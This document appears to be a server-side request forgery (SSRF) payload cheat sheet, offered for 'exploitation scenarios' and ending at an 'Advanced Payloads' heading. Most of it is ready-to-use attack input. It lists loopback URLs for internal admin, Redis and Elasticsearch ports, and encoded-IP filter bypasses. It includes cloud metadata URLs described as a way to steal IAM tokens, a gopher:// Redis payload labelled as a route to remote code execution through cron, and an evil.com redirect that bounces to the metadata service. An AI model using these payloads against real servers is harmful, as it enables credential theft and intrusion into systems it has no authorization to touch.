Explotación SSRF y Payloads Avanzados

Payload Library

Below are selected payloads chosen not only for their ability to generate a response, but for their tactical value in different exploitation scenarios. Each one includes technical context and guidance on when to use it.

• 1. Local access to internal services:

  These payloads attempt to connect to internal services bound to localhost or loopback addresses. Their purpose is to evaluate whether the server can access protected ports such as localhost:8000, where administrative interfaces, Redis, MongoDB, etc. often run.

  http://127.0.0.1:8000
http://localhost:8080/admin
http://[::1]:9200/ (IPv6 to Elasticsearch)
• 2. Validation bypass using alternative formats:

  Some defenses rely on detecting exact strings like 127.0.0.1 without considering alternative representations. These payloads bypass filters using decimal, hexadecimal, or octal encoding.

  http://2130706433 (127.0.0.1 in decimal)
  http://0x7f000001 (Hexadecimal)
  http://0177.0000.0000.0001 (Octal)
• 3. Cloud provider metadata access:

  These endpoints are exclusive to cloud services such as AWS, GCP, or Azure. Accessing them may allow attackers to steal IAM tokens, API keys, or temporary credentials.

  http://169.254.169.254/latest/meta-data/ (AWS)
  http://metadata.google.internal/computeMetadata/v1/ (GCP)
• 4. SSRF to RCE via Redis (Gopher):

  This payload uses the gopher:// protocol to communicate with Redis as if it were a client. It is useful in scenarios where Redis has no authentication and its content can be manipulated, for example to write commands into cron.

  gopher://127.0.0.1:6379/_%2A3%0D%0A%246%0D%0ASET%0D%0A%24%34%0D%0Acron%0D%0A%24%32%0D%0Aid%0D%0A
• 5. Redirects and request bouncing:

  Some servers allow redirections from a legitimate URL to an internal one. This type of payload attempts to exploit intermediate hosts with open redirect behavior.

  http://example.com/redirect?to=http://127.0.0.1:80
http://evil.com/forward?next=http://169.254.169.254

Advanced Payloads